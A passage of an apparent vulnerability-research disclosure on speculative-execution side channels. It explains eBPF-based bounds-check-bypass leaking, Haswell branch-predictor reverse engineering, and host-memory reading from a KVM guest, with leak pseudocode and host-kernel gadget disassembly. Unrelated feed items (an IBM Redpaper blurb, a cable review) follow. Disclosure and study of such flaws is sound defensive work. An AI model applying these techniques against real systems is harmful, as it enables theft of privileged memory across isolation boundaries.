Because such straightforward brute-force guessing of the address would be slow, the following optimization is used: 2^15 adjacent userspace memory mappings [9], each consisting of 2^4 pages, are created at the userspace address user_mapping_area, covering a total area of 2^31 bytes. Each mapping maps the same physical pages, and all mappings are present in the pagetables.


This permits the attack to be carried out in steps of 2^31 bytes. For each step, after causing an out-of-bounds access through prog_map, only one cache line each from the first 2^4 pages of user_mapping_area has to be tested for cached memory. Because the L3 cache is physically indexed, any access to a virtual address mapping a physical page will cause all other virtual addresses mapping the same physical page to become cached as well.
When this attack finds a hit—a cached memory location—the upper 33 bits of the kernel address are known (because they can be derived from the address guess at which the hit occurred), and the low 16 bits of the address are also known (from the offset inside user_mapping_area at which the hit was found). The remaining part of the address of user_mapping_area is the middle.


The remaining bits in the middle can be determined by bisecting the remaining address space: Map two physical pages to adjacent ranges of virtual addresses, each virtual address range the size of half of the remaining search space, then determine the remaining address bit-wise.
At this point, a second eBPF program can be used to actually leak data. In pseudocode, this program looks as follows:
uint64_t bitmask = <runtime-configurable>;
uint64_t bitshift_selector = <runtime-configurable>;
uint64_t prog_array_base_offset = <runtime-configurable>;
uint64_t secret_data_offset = <runtime-configurable>;
// index will be bounds-checked by the runtime,
// but the bounds check will be bypassed speculatively
uint64_t secret_data = bpf_map_read(array=victim_array, index=secret_data_offset);
// select a single bit, move it to a specific position, and add the base offset
uint64_t progmap_index = (((secret_data & bitmask) >> bitshift_selector) << 7) + prog_array_base_offset;
bpf_tail_call(prog_map, progmap_index);
This program reads 8-byte-aligned 64-bit values from an eBPF data array "victim_map" at a runtime-configurable offset and bitmasks and bit-shifts the value so that one bit is mapped to one of two values that are 2^7 bytes apart (sufficient to not land in the same or adjacent cache lines when used as an array index). Finally it adds a 64-bit offset, then uses the resulting value as an offset into prog_map for a tail call.
This program can then be used to leak memory by repeatedly calling the eBPF program with an out-of-bounds offset into victim_map that specifies the data to leak and an out-of-bounds offset into prog_map that causes prog_map + offset to point to a userspace memory area. Misleading the branch prediction and bouncing the cache lines works the same way as for the first eBPF program, except that now, the cache line holding the length of victim_map must also be bounced to another core.

Variant 2: Branch target injection

This section describes the theory behind our PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific version of Debian's distro kernel running on the host, can read host kernel memory at a rate of around 1500 bytes/second.

Basics

Prior research (see the Literature section at the end) has shown that it is possible for code in separate security contexts to influence each other's branch prediction. So far, this has only been used to infer information about where code is located (in other words, to create interference from the victim to the attacker); however, the basic hypothesis of this attack variant is that it can also be used to redirect execution of code in the victim context (in other words, to create interference from the attacker to the victim; the other way around).


The basic idea for the attack is to target victim code that contains an indirect branch whose target address is loaded from memory and flush the cache line containing the target address out to main memory. Then, when the CPU reaches the indirect branch, it won't know the true destination of the jump, and it won't be able to calculate the true destination until it has finished loading the cache line back into the CPU, which takes a few hundred cycles. Therefore, there is a time window of typically over 100 cycles in which the CPU will speculatively execute instructions based on branch prediction.

Haswell branch prediction internals

Some of the internals of the branch prediction implemented by Intel's processors have already been published; however, getting this attack to work properly required significant further experimentation to determine additional details.
This section focuses on the branch prediction internals that were experimentally derived from the Intel Haswell Xeon CPU.
Haswell seems to have multiple branch prediction mechanisms that work very differently:
  • A generic branch predictor that can only store one target per source address; used for all kinds of jumps, like absolute jumps, relative jumps and so on.
  • A specialized indirect call predictor that can store multiple targets per source address; used for indirect calls.
  • (There is also a specialized return predictor, according to Intel's optimization manual, but we haven't analyzed that in detail yet. If this predictor could be used to reliably dump out some of the call stack through which a VM was entered, that would be very interesting.)
Generic predictor

The generic branch predictor, as documented in prior research, only uses the lower 31 bits of the address of the last byte of the source instruction for its prediction. If, for example, a branch target buffer (BTB) entry exists for a jump from 0x4141.0004.1000 to 0x4141.0004.5123, the generic predictor will also use it to predict a jump from 0x4242.0004.1000. When the higher bits of the source address differ like this, the higher bits of the predicted destination change together with it—in this case, the predicted destination address will be 0x4242.0004.5123—so apparently this predictor doesn't store the full, absolute destination address.
Before the lower 31 bits of the source address are used to look up a BTB entry, they are folded together using XOR. Specifically, the following bits are folded together:
bit A          bit B
0x40.0000      0x2000
0x80.0000      0x4000
0x100.0000     0x8000
0x200.0000     0x1.0000
0x400.0000     0x2.0000
0x800.0000     0x4.0000
0x2000.0000    0x10.0000
0x4000.0000    0x20.0000
In other words, if a source address is XORed with both numbers in a row of this table, the branch predictor will not be able to distinguish the resulting address from the original source address when performing a lookup. For example, the branch predictor is able to distinguish source addresses 0x100.0000 and 0x180.0000, and it can also distinguish source addresses 0x100.0000 and 0x180.8000, but it can't distinguish source addresses 0x100.0000 and 0x140.2000 or source addresses 0x100.0000 and 0x180.4000. In the following, this will be referred to as aliased source addresses.
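The folding can be expressed compactly in code. Here is a small, hedged C sketch (the pairs are copied from the table above, and the example source address is the 0x100.0000 used in the text) that prints one aliased address per table row; the first row reproduces the 0x140.2000 alias mentioned above.

#include <stdint.h>
#include <stdio.h>

/* Bit pairs from the table above: XORing a source address with both bits of
   any row produces an address the generic predictor cannot distinguish from
   the original ("aliased source addresses"). */
static const uint64_t fold_pairs[][2] = {
  { 0x400000,    0x2000   },
  { 0x800000,    0x4000   },
  { 0x1000000,   0x8000   },
  { 0x2000000,   0x10000  },
  { 0x4000000,   0x20000  },
  { 0x8000000,   0x40000  },
  { 0x20000000,  0x100000 },
  { 0x40000000,  0x200000 },
};

int main(void) {
  uint64_t src = 0x1000000;  /* 0x100.0000, the example used in the text */
  for (unsigned i = 0; i < sizeof(fold_pairs) / sizeof(fold_pairs[0]); i++) {
    uint64_t alias = src ^ fold_pairs[i][0] ^ fold_pairs[i][1];
    printf("alias of %#llx: %#llx\n",
           (unsigned long long)src, (unsigned long long)alias);
  }
  return 0;
}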
When an aliased source address is used, the branch predictor will still predict the same target as for the unaliased source address. This indicates that the branch predictor stores a truncated absolute destination address, but that hasn't been verified.
Based on observed maximum forward and backward jump distances for different source addresses, the low 32-bit half of the target address could be stored as an absolute 32-bit value with an additional bit that specifies whether the jump from source to target crosses a 2^32 boundary; if the jump crosses such a boundary, bit 31 of the source address determines whether the high half of the instruction pointer should increment or decrement.

Indirect call predictor

The inputs of the BTB lookup for this mechanism seem to be:
  • The low 12 bits of the address of the source instruction (we are not sure whether it's the address of the first or the last byte) or a subset of them.
  • The branch history buffer state.

If the indirect call predictor can't resolve a branch, it is resolved by the generic predictor instead. Intel's optimization manual hints at this behavior: "Indirect Calls and Jumps. These may either be predicted as having a monotonic target or as having targets that vary in accordance with recent program behavior."
The branch history buffer (BHB) stores information about the last 29 taken branches - basically a fingerprint of recent control flow - and is used to allow better prediction of indirect calls that can have multiple targets.
The update function of the BHB works as follows (in pseudocode; src is the address of the last byte of the source instruction, dst is the destination address):
void bhb_update(uint58_t *bhb_state, unsigned long src, unsigned long dst) {
  *bhb_state <<= 2;
  *bhb_state ^= (dst & 0x3f);
  *bhb_state ^= (src & 0xc0) >> 6;
  *bhb_state ^= (src & 0xc00) >> (10 - 2);
  *bhb_state ^= (src & 0xc000) >> (14 - 4);
  *bhb_state ^= (src & 0x30) << (6 - 4);
  *bhb_state ^= (src & 0x300) << (8 - 8);
  *bhb_state ^= (src & 0x3000) >> (12 - 10);
  *bhb_state ^= (src & 0x30000) >> (16 - 12);
  *bhb_state ^= (src & 0xc0000) >> (18 - 14);
}
Some of the bits of the BHB state seem to be folded together further using XOR when used for a BTB access, but the precise folding function hasn't been understood yet.
The BHB is interesting for two reasons. First, knowledge about its approximate behavior is required in order to be able to accurately cause collisions in the indirect call predictor. But it also permits dumping out the BHB state at any repeatable program state at which the attacker can execute code - for example, when attacking a hypervisor, directly after a hypercall. The dumped BHB state can then be used to fingerprint the hypervisor or, if the attacker has access to the hypervisor binary, to determine the low 20 bits of the hypervisor load address (in the case of KVM: the low 20 bits of the load address of kvm-intel.ko).

Reverse-Engineering Branch Predictor Internals

This subsection describes how we reverse-engineered the internals of the Haswell branch predictor. Some of this is written down from memory, since we didn't keep a detailed record of what we were doing.
We initially attempted to perform BTB injections into the kernel using the generic predictor, using the knowledge from prior research that the generic predictor only looks at the lower half of the source address and that only a partial target address is stored. This kind of worked - however, the injection success rate was very low, below 1%. (This is the method we used in our preliminary PoCs for method 2 against modified hypervisors running on Haswell.)
We decided to write a userspace test case to be able to more easily test branch predictor behavior in different situations.
Based on the assumption that branch predictor state is shared between hyperthreads [10], we wrote a program of which two instances are each pinned to one of the two logical processors running on a specific physical core, where one instance attempts to perform branch injections while the other measures how often branch injections are successful. Both instances were executed with ASLR disabled and had the same code at the same addresses. The injecting process performed indirect calls to a function that accesses a (per-process) test variable; the measuring process performed indirect calls to a function that tests, based on timing, whether the per-process test variable is cached, and then evicts it using CLFLUSH. Both indirect calls were performed through the same callsite. Before each indirect call, the function pointer stored in memory was flushed out to main memory using CLFLUSH to widen the speculation time window. Additionally, because of the reference to "recent program behavior" in Intel's optimization manual, a bunch of conditional branches that are always taken were inserted in front of the indirect call.
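The core of that injector loop might look roughly like the following (a reconstruction for illustration only, not the actual test program; the names and structure are made up):

#include <x86intrin.h>

static int test_variable;                       /* per-process test variable */
static void touch_test_variable(void) { test_variable++; }
static void (*call_target)(void) = touch_test_variable;

/* Flushing the function pointer forces the real target to be resolved from
   DRAM, so the indirect call below is steered by the predictor for a few
   hundred cycles before the CPU can verify the destination. */
static void inject_once(void) {
  _mm_clflush((const void *)&call_target);
  _mm_mfence();
  /* always-taken conditional branches would be placed here to set up the
     branch history buffer ("recent program behavior") */
  call_target();                                /* the shared callsite */
}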
In this test, the injection success rate was above 99%, giving us a base setup for future experiments.


We then tried to figure out the details of the prediction scheme. We assumed that the prediction scheme uses a global branch history buffer of some kind.
To determine the duration for which branch information stays in the history buffer, a conditional branch that is only taken in one of the two program instances was inserted in front of the series of always-taken conditional jumps, then the number of always-taken conditional jumps (N) was varied. The result was that for N=25, the processor was able to distinguish the branches (misprediction rate under 1%), but for N=26, it failed to do so (misprediction rate over 99%). Therefore, the branch history buffer had to be able to store information about at least the last 26 branches.
The code in one of the two program instances was then moved around in memory. This revealed that only the lower 20 bits of the source and target addresses have an influence on the branch history buffer.
Testing with different types of branches in the two program instances revealed that static jumps, taken conditional jumps, calls and returns influence the branch history buffer the same way; non-taken conditional jumps don't influence it; the address of the last byte of the source instruction is the one that counts; IRETQ doesn't influence the history buffer state (which is useful for testing because it permits creating program flow that is invisible to the history buffer).
Moving the last conditional branch before the indirect call around in memory multiple times revealed that the branch history buffer contents can be used to distinguish many different locations of that last conditional branch instruction. This suggests that the history buffer doesn't store a list of small history values; instead, it seems to be a larger buffer in which history data is mixed together.
However, a history buffer needs to "forget" about past branches after a certain number of new branches have been taken in order to be useful for branch prediction. Therefore, when new data is mixed into the history buffer, this can not cause information in bits that are already present in the history buffer to propagate downwards - and given that, upwards combination of information probably wouldn't be very useful either. Given that branch prediction also must be very fast, we concluded that it is likely that the update function of the history buffer left-shifts the old history buffer, then XORs in the new state (see diagram).


If this assumption is correct, then the history buffer contains a lot of information about the most recent branches, but only contains as many bits of information as are shifted per history buffer update about the last branch about which it contains any data. Therefore, we tested whether flipping different bits in the source and target addresses of a jump followed by 32 always-taken jumps with static source and target allows the branch prediction to disambiguate an indirect call. [11]
With 32 static jumps in between, no bit flips seemed to have an influence, so we decreased the number of static jumps until a difference was observable. The result with 28 always-taken jumps in between was that bits 0x1 and 0x2 of the target and bits 0x40 and 0x80 of the source had such an influence; but flipping both 0x1 in the target and 0x40 in the source or 0x2 in the target and 0x80 in the source did not permit disambiguation. This shows that the per-insertion shift of the history buffer is 2 bits and shows which data is stored in the least significant bits of the history buffer. We then repeated this with decreased amounts of fixed jumps after the bit-flipped jump to determine which information is stored in the remaining bits.

Reading host memory from a KVM guest

Locating the host kernel

Our PoC locates the host kernel in several steps. The information that is determined and necessary for the next steps of the attack consists of:
  • lower 20 bits of the address of kvm-intel.ko
  • full address of kvm.ko
  • full address of vmlinux

Looking back, this is unnecessarily complicated, but it nicely demonstrates the various techniques an attacker can use. A simpler way would be to first determine the address of vmlinux, then bisect the addresses of kvm.ko and kvm-intel.ko.
In the first step, the address of kvm-intel.ko is leaked. For this purpose, the branch history buffer state after guest entry is dumped out. Then, for every possible value of bits 12..19 of the load address of kvm-intel.ko, the expected lowest 16 bits of the history buffer are computed based on the load address guess and the known offsets of the last 8 branches before guest entry, and the results are compared against the lowest 16 bits of the leaked history buffer state.
The branch history buffer state is leaked in steps of 2 bits by measuring misprediction rates of an indirect call with two targets. One way the indirect call is reached is from a vmcall instruction followed by a series of N branches whose relevant source and target address bits are all zeroes. The second way the indirect call is reached is from a series of controlled branches in userspace that can be used to write arbitrary values into the branch history buffer.

Misprediction rates are measured as in the section "Reverse-Engineering Branch Predictor Internals", using one call target that loads a cache line and another one that checks whether the same cache line has been loaded.


With N=29, mispredictions will occur at a high rate if the controlled branch history buffer value is zero because all history buffer state from the hypercall has been erased. With N=28, mispredictions will occur if the controlled branch history buffer value is one of 0<<(28*2), 1<<(28*2), 2<<(28*2), 3<<(28*2) - by testing all four possibilities, it can be detected which one is right. Then, for decreasing values of N, the four possibilities are {0|1|2|3}<<(28*2) | (history_buffer_for(N+1) >> 2). By repeating this for decreasing values for N, the branch history buffer value for N=0 can be determined.
At this point, the low 20 bits of kvm-intel.ko are known; the next step is to roughly locate kvm.ko. For this, the generic branch predictor is used, using data inserted into the BTB by an indirect call from kvm.ko to kvm-intel.ko that happens on every hypercall; this means that the source address of the indirect call has to be leaked out of the BTB.
kvm.ko will probably be located somewhere in the range from 0xffffffffc0000000 to 0xffffffffc4000000, with page alignment (0x1000). This means that the first four entries in the table in the section "Generic Predictor" apply; there will be 2^4-1=15 aliasing addresses for the correct one. But that is also an advantage: It cuts down the search space from 0x4000 to 0x4000/2^4=1024.
To find the right address for the source or one of its aliasing addresses, code that loads data through a specific register is placed at all possible call targets (the leaked low 20 bits of kvm-intel.ko plus the in-module offset of the call target plus a multiple of 2^20) and indirect calls are placed at all possible call sources. Then, alternatingly, hypercalls are performed and indirect calls are performed through the different possible non-aliasing call sources, with randomized history buffer state that prevents the specialized prediction from working. After this step, there are 2^16 remaining possibilities for the load address of kvm.ko.
Next, the load address of vmlinux can be determined in a similar way, using an indirect call from vmlinux to kvm.ko. Luckily, none of the bits which are randomized in the load address of vmlinux are folded together, so unlike when locating kvm.ko, the result will directly be unique. vmlinux has an alignment of 2MiB and a randomization range of 1GiB, so there are still only 512 possible addresses. Because (as far as we know) a simple hypercall won't actually cause indirect calls from vmlinux to kvm.ko, we instead use port I/O from the status register of an emulated serial port, which is present in the default configuration of a virtual machine created with virt-manager.
The only remaining piece of information is which one of the 16 aliasing load addresses of kvm.ko is actually correct. Because the source address of an indirect call to kvm.ko is known, this can be solved using bisection: Place code at the various possible targets that, depending on which instance of the code is speculatively executed, loads one of two cache lines, and measure which one of the cache lines gets loaded.

Identifying cache sets

The PoC assumes that the VM does not have access to hugepages. To discover eviction sets for all L3 cache sets with a specific alignment relative to a 4KiB page boundary, the PoC first allocates 25600 pages of memory. Then, in a loop, it selects random subsets of all remaining unsorted pages such that the expected number of sets for which an eviction set is contained in the subset is 1, reduces each subset down to an eviction set by repeatedly accessing its cache lines and testing whether the cache lines are always cached (in which case they're probably not part of an eviction set) and attempts to use the new eviction set to evict all remaining unsorted cache lines to determine whether they are in the same cache set [12].

Locating the host-virtual address of a guest page

Because this attack uses a FLUSH+RELOAD approach for leaking data, it needs to know the host-kernel-virtual address of one guest page. Alternative approaches such as PRIME+PROBE should work without that requirement.
The basic idea for this step of the attack is to use a branch target injection attack against the hypervisor to load an attacker-controlled address and test whether that caused the guest-owned page to be loaded. For this, a gadget that simply loads from the memory location specified by R8 can be used - R8-R11 still contain guest-controlled values when the first indirect call after a guest exit is reached on this kernel build.
We expected that an attacker would need to either know which eviction set has to be used at this point or brute-force it simultaneously; however, experimentally, using random eviction sets works, too. Our theory is that the observed behavior is actually the result of L1D and L2 evictions, which might be sufficient to permit a few instructions worth of speculative execution.
The host kernel maps (nearly?) all physical memory in the physmap area, including memory assigned to KVM guests. However, the location of the physmap is randomized (with a 1GiB alignment), in an area of size 128PiB. Therefore, directly bruteforcing the host-virtual address of a guest page would take a long time. It is not necessarily impossible; as a ballpark estimate, it should be possible within a day or so, maybe less, assuming 12000 successful injections per second and 30 guest pages that are tested in parallel; but not as impressive as doing it in a few minutes.
To optimize this, the problem can be split up: First, brute-force the physical address using a gadget that can load from physical addresses, then brute-force the base address of the physmap region. Because the physical address can usually be assumed to be far below 128PiB, it can be brute-forced more efficiently, and brute-forcing the base address of the physmap region afterwards is also easier because then address guesses with 1GiB alignment can be used.
To brute-force the physical address, the following gadget can be used:
ffffffff810a9def:       4c 89 c0                mov    rax,r8
ffffffff810a9df2:       4d 63 f9                movsxd r15,r9d
ffffffff810a9df5:       4e 8b 04 fd c0 b3 a6    mov    r8,QWORD PTR [r15*8-0x7e594c40]
ffffffff810a9dfc:       81
ffffffff810a9dfd:       4a 8d 3c 00             lea    rdi,[rax+r8*1]
ffffffff810a9e01:       4d 8b a4 00 f8 00 00    mov    r12,QWORD PTR [r8+rax*1+0xf8]
ffffffff810a9e08:       00
This gadget permits loading an 8-byte-aligned value from the area around the kernel text section by setting R9 appropriately, which in particular permits loading page_offset_base, the start address of the physmap. Then, the value that was originally in R8 - the physical address guess minus 0xf8 - is added to the result of the previous load, 0xfa is added to it, and the result is dereferenced.

Cache set selection

To select the correct L3 eviction set, the attack from the following section is essentially executed with different eviction sets until it works.

Leaking data

At this point, it would normally be necessary to locate gadgets in the host kernel code that can be used to actually leak data by reading from an attacker-controlled location, shifting and masking the result appropriately and then using the result of that as offset to an attacker-controlled address for a load. But piecing gadgets together and figuring out which ones work in a speculation context seems annoying. So instead, we decided to use the eBPF interpreter, which is built into the host kernel - while there is no legitimate way to invoke it from inside a VM, the presence of the code in the host kernel's text section is sufficient to make it usable for the attack, just like with ordinary ROP gadgets.
The eBPF interpreter entry point has the following function signature:
static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn)
The second parameter is a pointer to an array of statically pre-verified eBPF instructions to be executed - which means that __bpf_prog_run() will not perform any type checks or bounds checks. The first parameter is simply stored as part of the initial emulated register state, so its value doesn't matter.
The eBPF interpreter provides, among other things:
  • multiple emulated 64-bit registers
  • 64-bit immediate writes to emulated registers
  • memory reads from addresses stored in emulated registers
  • bitwise operations (including bit shifts) and arithmetic operations

To call the interpreter entry point, a gadget that gives RSI and RIP control given R8-R11 control and controlled data at a known memory location is necessary. The following gadget provides this functionality:
ffffffff81514edd:       4c 89 ce                mov    rsi,r9
ffffffff81514ee0:       41 ff 90 b0 00 00 00    call   QWORD PTR [r8+0xb0]
Now, by pointing R8 and R9 at the mapping of a guest-owned page in the physmap, it is possible to speculatively execute arbitrary unvalidated eBPF bytecode in the host kernel. Then, relatively straightforward bytecode can be used to leak data into the cache.

Variant 3: Rogue data cache load

Basically, read Anders Fogh's blogpost: https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/
In summary, an attack using this variant of the issue attempts to read kernel memory from userspace without misdirecting the control flow of kernel code. This works by using the code pattern that was used for the previous variants, but in userspace. The underlying idea is that the permission check for accessing an address might not be on the critical path for reading data from memory to a register, where the permission check could have significant performance impact. Instead, the memory read could make the result of the read available to following instructions immediately and only perform the permission check asynchronously, setting a flag in the reorder buffer that causes an exception to be raised if the permission check fails.
We do have a few additions to make to Anders Fogh's blogpost:
"Imagine the following instruction executed in usermodemov rax,[somekernelmodeaddress]It will cause an interrupt when retired, [...]"
It is also possible to already execute that instruction behind a high-latency mispredicted branch to avoid taking a page fault. This might also widen the speculation window by increasing the delay between the read from a kernel address and delivery of the associated exception.
"First, I call a syscall that touches this memory. Second, I use the prefetcht0 instruction to improve my odds of having the address loaded in L1."
When we used prefetch instructions after doing a syscall, the attack stopped working for us, and we have no clue why. Perhaps the CPU somehow stores whether access was denied on the last access and prevents the attack from working if that is the case?
"Fortunately I did not get a slow read suggesting that Intel null’s the result when the access is not allowed."
That (read from kernel address returns all-zeroes) seems to happen for memory that is not sufficiently cached but for which pagetable entries are present, at least after repeated read attempts. For unmapped memory, the kernel address read does not return a result at all.

Ideas for further research

We believe that our research provides many remaining research topics that we have not yet investigated, and we encourage other public researchers to look into these. This section contains an even higher amount of speculation than the rest of this blogpost - it contains untested ideas that might well be useless.

Leaking without data cache timing

It would be interesting to explore whether there are microarchitectural attacks other than measuring data cache timing that can be used for exfiltrating data out of speculative execution.

Other microarchitectures

Our research was relatively Haswell-centric so far. It would be interesting to see details e.g. on how the branch prediction of other modern processors works and how well it can be attacked.

Other JIT engines

We developed a successful variant 1 attack against the JIT engine built into the Linux kernel. It would be interesting to see whether attacks against more advanced JIT engines with less control over the system are also practical - in particular, JavaScript engines.

More efficient scanning for host-virtual addresses and cache sets

In variant 2, while scanning for the host-virtual address of a guest-owned page, it might make sense to attempt to determine its L3 cache set first. This could be done by performing L3 evictions using an eviction pattern through the physmap, then testing whether the eviction affected the guest-owned page.
The same might work for cache sets - use an L1D+L2 eviction set to evict the function pointer in the host kernel context, use a gadget in the kernel to evict an L3 set using physical addresses, then use that to identify which cache sets guest lines belong to until a guest-owned eviction set has been constructed.

Dumping the complete BTB state

Given that the generic BTB seems to only be able to distinguish 2^31-8 or fewer source addresses, it seems feasible to dump out the complete BTB state generated by e.g. a hypercall in a timeframe around the order of a few hours. (Scan for jump sources, then for every discovered jump source, bisect the jump target.) This could potentially be used to identify the locations of functions in the host kernel even if the host kernel is custom-built.
The source address aliasing would reduce the usefulness somewhat, but because target addresses don't suffer from that, it might be possible to correlate (source,target) pairs from machines with different KASLR offsets and reduce the number of candidate addresses based on KASLR being additive while aliasing is bitwise.
This could then potentially allow an attacker to make guesses about the host kernel version or the compiler used to build it based on jump offsets or distances between functions.

Variant 2: Leaking with more efficient gadgets

If sufficiently efficient gadgets are used for variant 2, it might not be necessary to evict host kernel function pointers from the L3 cache at all; it might be sufficient to only evict them from L1D and L2.

Various speedups

In particular the variant 2 PoC is still a bit slow. This is probably partly because:
  • It only leaks one bit at a time; leaking more bits at a time should be doable.
  • It heavily uses IRETQ for hiding control flow from the processor.

It would be interesting to see what data leak rate can be achieved using variant 2.

Leaking or injection through the return predictor

If the return predictor also doesn't lose its state on a privilege level change, it might be useful for either locating the host kernel from inside a VM (in which case bisection could be used to very quickly discover the full address of the host kernel) or injecting return targets (in particular if the return address is stored in a cache line that can be flushed out by the attacker and isn't reloaded before the return instruction).
However, we have not performed any experiments with the return predictor that yielded conclusive results so far.

Leaking data out of the indirect call predictor

We have attempted to leak target information out of the indirect call predictor, but haven't been able to make it work.

Vendor statements

The following statements were provided to us regarding this issue by the vendors to whom Project Zero disclosed this vulnerability:

Intel

No current statement provided at this time.

AMD

No current statement provided at this time.

ARM

Arm recognises that the speculation functionality of many modern high-performance processors, despite working as intended, can be used in conjunction with the timing of cache operations to leak some information as described in this blog. Correspondingly, Arm has developed software mitigations that we recommend be deployed.
Specific details regarding the affected processors and mitigations can be found at this website: https://developer.arm.com/support/security-update
Arm has included a detailed technical whitepaper as well as links to information from some of Arm’s architecture partners regarding their specific implementations and mitigations.

Literature

Note that some of these documents - in particular Intel's documentation - change over time, so quotes from and references to them may not reflect the latest version of Intel's documentation.
  • https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-optimization-manual.pdf: Intel's optimization manual has many interesting pieces of optimization advice that hint at relevant microarchitectural behavior; for example:
    • "Placing data immediately following an indirect branch can cause a performance problem. If the data consists of all zeros, it looks like a long stream of ADDs to memory destinations and this can cause resource conflicts and slow down branch recovery. Also, data immediately following indirect branches may appear as branches to the branch predication [sic] hardware, which can branch off to execute other data pages. This can lead to subsequent self-modifying code problems."
    • "Loads can:[...]Be carried out speculatively, before preceding branches are resolved."
    • "Software should avoid writing to a code page in the same 1-KByte subpage that is being executed or fetching code in the same 2-KByte subpage of that is being written. In addition, sharing a page containing directly or speculatively executed code with another processor as a data page can trigger an SMC condition that causes the entire pipeline of the machine and the trace cache to be cleared. This is due to the self-modifying code condition."
    • "if mapped as WB or WT, there is a potential for speculative processor reads to bring the data into the caches"
    • "Failure to map the region as WC may allow the line to be speculatively read into the processor caches (via the wrong path of a mispredicted branch)."
  • https://software.intel.com/en-us/articles/intel-sdm: Intel's Software Developer Manuals
  • http://www.agner.org/optimize/microarchitecture.pdf: Agner Fog's documentation of reverse-engineered processor behavior and relevant theory was very helpful for this research.
  • http://www.cs.binghamton.edu/~dima/micro16.pdf and https://github.com/felixwilhelm/mario_baslr: Prior research by Dmitry Evtyushkin, Dmitry Ponomarev and Nael Abu-Ghazaleh on abusing branch target buffer behavior to leak addresses that we used as a starting point for analyzing the branch prediction of Haswell processors. Felix Wilhelm's research based on this provided the basic idea behind variant 2.
  • https://arxiv.org/pdf/1507.06955.pdf: The rowhammer.js research by Daniel Gruss, Clémentine Maurice and Stefan Mangard contains information about L3 cache eviction patterns that we reused in the KVM PoC to evict a function pointer.
  • https://xania.org/201602/bpu-part-one: Matt Godbolt blogged about reverse-engineering the structure of the branch predictor on Intel processors.
  • https://www.sophia.re/thesis.pdf: Sophia D'Antoine wrote a thesis that shows that opcode scheduling can theoretically be used to transmit data between hyperthreads.
  • https://gruss.cc/files/kaiser.pdf: Daniel Gruss, Moritz Lipp, Michael Schwarz, Richard Fellner, Clémentine Maurice, and Stefan Mangard wrote a paper on mitigating microarchitectural issues caused by pagetable sharing between userspace and the kernel.
  • https://www.jilp.org/: This journal contains many articles on branch prediction.
  • http://blog.stuffedcow.net/2013/01/ivb-cache-replacement/: This blogpost by Henry Wong investigates the L3 cache replacement policy used by Intel's Ivy Bridge architecture.
References

[1] This initial report did not contain any information about variant 3. We had discussed whether direct reads from kernel memory could work, but thought that it was unlikely. We later tested and reported variant 3 prior to the publication of Anders Fogh's work at https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/.

[2] The precise model names are listed in the section "Tested Processors". The code for reproducing this is in the writeup_files.tar archive in our bugtracker, in the folders userland_test_x86 and userland_test_aarch64.

[3] The attacker-controlled offset used to perform an out-of-bounds access on an array by this PoC is a 32-bit value, limiting the accessible addresses to a 4GiB window in the kernel heap area.

[4] This PoC won't work on CPUs with SMAP support; however, that is not a fundamental limitation.

[5] linux-image-4.9.0-3-amd64 at version 4.9.30-2+deb9u2 (available at http://snapshot.debian.org/archive/debian/20170701T224614Z/pool/main/l/linux/linux-image-4.9.0-3-amd64_4.9.30-2%2Bdeb9u2_amd64.deb, sha256 5f950b26aa7746d75ecb8508cc7dab19b3381c9451ee044cd2edfd6f5efff1f8, signed via Release.gpg, Release, Packages.xz); that was the current distro kernel version when I set up the machine. It is very unlikely that the PoC works with other kernel versions without changes; it contains a number of hardcoded addresses/offsets.

[6] The phone was running an Android build from May 2017.

[7] https://software.intel.com/en-us/articles/intel-sdm

[8] https://software.intel.com/en-us/articles/avoiding-and-identifying-false-sharing-among-threads, section "background"

[9] More than 2^15 mappings would be more efficient, but the kernel places a hard cap of 2^16 on the number of VMAs that a process can have.

[10] Intel's optimization manual states that "In the first implementation of HT Technology, the physical execution resources are shared and the architecture state is duplicated for each logical processor", so it would be plausible for predictor state to be shared. While predictor state could be tagged by logical core, that would likely reduce performance for multithreaded processes, so it doesn't seem likely.

[11] In case the history buffer was a bit bigger than we had measured, we added some margin - in particular because we had seen slightly different history buffer lengths in different experiments, and because 26 isn't a very round number.

[12] The basic idea comes from http://palms.ee.princeton.edu/system/files/SP_vfinal.pdf, section IV, although the authors of that paper still used hugepages.
Categories: Security

Leveraging Integrated Cryptographic Service Facility

IBM Redbooks Site - Wed, 01/03/2018 - 08:30
Redpaper, published: Wed, 3 Jan 2018

Integrated Cryptographic Service Facility (ICSF) is a part of the IBM® z/OS® operating system that provides cryptographic functions for data security, data integrity, personal identification, digital signatures, and the management of cryptographic keys.

Categories: Technology

Review: Anker PowerLine+ II versus PowerLine+ -- high quality nylon USB to Lightning cords

iPhone J.D. - Wed, 01/03/2018 - 00:34

Last year, I reviewed the Anker PowerLine+ USB to Lightning cord, and I was incredibly impressed.  It costs less than the cord that Apple sells (or includes with an iPhone or iPad), and it is far more durable.  Indeed, shortly after I purchased that cord, two of the Apple Lightning cords that some of my family members had been using started to fray near the ends.  Rather than risk damage to their iPhones, those cords went right into the trash and I decided to order some more Anker cords from Amazon.  We got different colors for different family members to avoid confusion, and this also gave me an opportunity to compare the difference between the original version of the Anker PowerLine+ and the Anker PowerLine+ II. 

Durability

The PowerLine+ I have been using for months seems incredibly durable.  The nylon surrounding the cord protects the cord and makes it virtually impossible to knot the cord.  And the plugs on the ends seem much more durable than the Apple Lightning cords — which always seem to be the spot where my Apple cords fray over time.

The PowerLine+ II cord also features nylon surrounding the cord, but it is just a hair thicker.  And the plugs on the ends of the PowerLine+ II are a little bit larger and are more tapered than the PowerLine+ cord.  In the following picture, the Lightning end of the PowerLine+ II is at the top, followed by the Lightning end of the PowerLine+, then the USB end of the PowerLine+ II, and at the bottom the USB end of the PowerLine+.

What difference does this make?  Anker advertises the PowerLine+ as lasting 6 times longer than other (unspecified) Lightning cables with a 6,000+ bend lifespan.  Anker advertises the PowerLine+ II as lasting 30 times longer than ordinary cables, able to withstand 30,000 bends.  So apparently Anker believes that the PowerLine+ II is about five times more durable than the PowerLine+ cord.  Anker says that both cords have a tensile strength that can support 175 pounds.

The PowerLine+ comes with an 18 month warranty, but the PowerLine+ II comes with a lifetime warranty.  Anker's website says:  "We're so confident in PowerLine+ II, we are offering a hassle-free replacement for all quality issues.  Not for half a year, not for 18 months, but for an entire lifetime.  It's the only cable you will ever need to buy."

